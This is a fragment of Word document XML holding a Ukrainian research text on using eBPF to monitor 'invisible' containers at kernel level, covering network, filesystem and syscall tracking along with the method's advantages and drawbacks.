      <w:r w:rsidRPr="0042687A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00A80F8E" w:rsidP="00A80F8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В цілому з</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">астосування eBPF для роботи з контейнерами дає можливість стежити за їх діяльністю без необхідності безпосередньо втручатися в контейнери або використовувати традиційні інструменти. Це особливо корисно для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>невидимих</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> контейнерів, оскільки eBPF дозволяє отримувати детальну інформацію про їх виконання, мережеву активність, файлові операції та інші аспекти</w:t>
      </w:r>
      <w:r w:rsidR="0042687A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> [29</w:t>
      </w:r>
      <w:r w:rsidR="0042687A" w:rsidRPr="0042687A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00A80F8E" w:rsidP="00A80F8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Тому, у</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> рамках дослідження було розроблено та впроваджено систему моніторингу для невидимих контейнерів, використовуючи eBPF для відстеження низькорівневих операцій в контейнерах. </w:t>
      </w:r>
      <w:r w:rsidR="0042687A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Це включало</w:t>
      </w:r>
      <w:r w:rsidR="0042687A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [30]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00A80F8E" w:rsidP="00A80F8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Pr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Мо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ніторинг мережевої активності.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Завдяки eBPF можна було спостерігати за всіма мережеими запитами, які відправляються та </w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>приймаються контейнерами, навіть якщо ці контейнери не мають явної мережевої конфігурації. Це дозволяє відстежувати несанкціо</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>новані або підозрілі мережеві з’</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>єднання та здійснювати їх аналіз.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00A80F8E" w:rsidP="00A80F8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Pr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Інст</w:t>
      </w:r>
      <w:r w:rsidR="00797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>рументування файлової системи.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Використовуючи eBPF, можна відстеж</w:t>
      </w:r>
      <w:r w:rsidR="00797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>увати всі системні виклики, пов’</w:t>
      </w:r>
      <w:r w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>язані з файловими операціями в контейнерах, наприклад, відкриття, запис або зчитування файлів. Це дозволяє виявляти потенційно небезпечні чи аномальні дії в тих контейнерах, які працюють в ізольованих або непомітних середовищах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00797EE8" w:rsidP="00A80F8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Аудит системних викликів.</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> За допомогою eBPF можна також зібрати статистику про системні виклики, що здійснюються контейнерами. Це дає змогу створити точну картину виконання коду на рівні ядра, не порушуючи роботу контейнерів, навіть якщо вони не мають інтеграції з традиційними засобами моніторингу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797EE8" w:rsidRDefault="00797EE8" w:rsidP="00A80F8E">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797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Отже, розглядаючи переваги розробленої технології інтеграції </w:t>
      </w:r>
      <w:r w:rsidR="0005354B" w:rsidRPr="00BC794C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="00797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, необхідно зосередитися на отриманих результатах, які в подальшому можна впровадити в сучасні ІТ-архітектури та системи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00797EE8" w:rsidP="00A80F8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 Низький рівень впливу.</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Завдяки тому, що eBPF працює на рівні ядра, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>було</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> отрим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ано</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> детальну інформацію про процеси та контейнери без необхідності втручання у їх виконання.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00797EE8" w:rsidP="00A80F8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 Висока гнучкість.</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> eBPF дозвол</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ило</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> створ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ти спеціалізовані фільтри для моніторинг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">у конкретних системних викликів, а також </w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>мережевих операцій.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00797EE8" w:rsidP="00A80F8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3. Покращена безпека.</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Моніторинг на рівні ядра </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>надав</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> можливість виявляти потенційно небезпечні </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> аномальні дії, які могли б бути невиявленими за допомогою традиційних методів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797EE8" w:rsidRDefault="00797EE8" w:rsidP="00A80F8E">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797EE8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>За цих переваг також були виявлені і певні недоліки, зокрема:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00797EE8" w:rsidP="00A80F8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 Складність налаштування.</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Використання eBPF вимагає високих знань про внутрішню архітектуру </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>та контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A80F8E" w:rsidRPr="00A80F8E" w:rsidRDefault="00797EE8" w:rsidP="00A80F8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2. Продуктивність.</w:t>
      </w:r>
      <w:r w:rsidR="00A80F8E" w:rsidRPr="00A80F8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Оскільки eBPF працює в режимі ядра, некоректне налаштування фільтрів або надмірна кількість логів можуть вплинути на продуктивність системи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910805" w:rsidRDefault="00910805" w:rsidP="00910805">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За результатами</w:t>
      </w:r>
      <w:r w:rsidRPr="00910805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> проведеного дослідження, можна стверджувати, що проект має високий практичний потенціал завдяки використанню eBPF для моніторингу невидимих контейнерів.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00910805" w:rsidRDefault="00910805" w:rsidP="00910805">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910805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Дослідження підтверджує значний вклад цієї технології в покращення безпеки та моніторингу складних середовищ, де традиційні інструменти можуть бути менш ефективними або навіть непридатними. Зокрема, було доведено, що eBPF дозволяє створювати потужні системи моніторингу, які функціонують на рівні ядра операційної системи, не потребуючи втручання в роботу самих контейнерів. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Що є</w:t>
      </w:r>
      <w:r w:rsidRPr="00910805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> особливо важлив</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
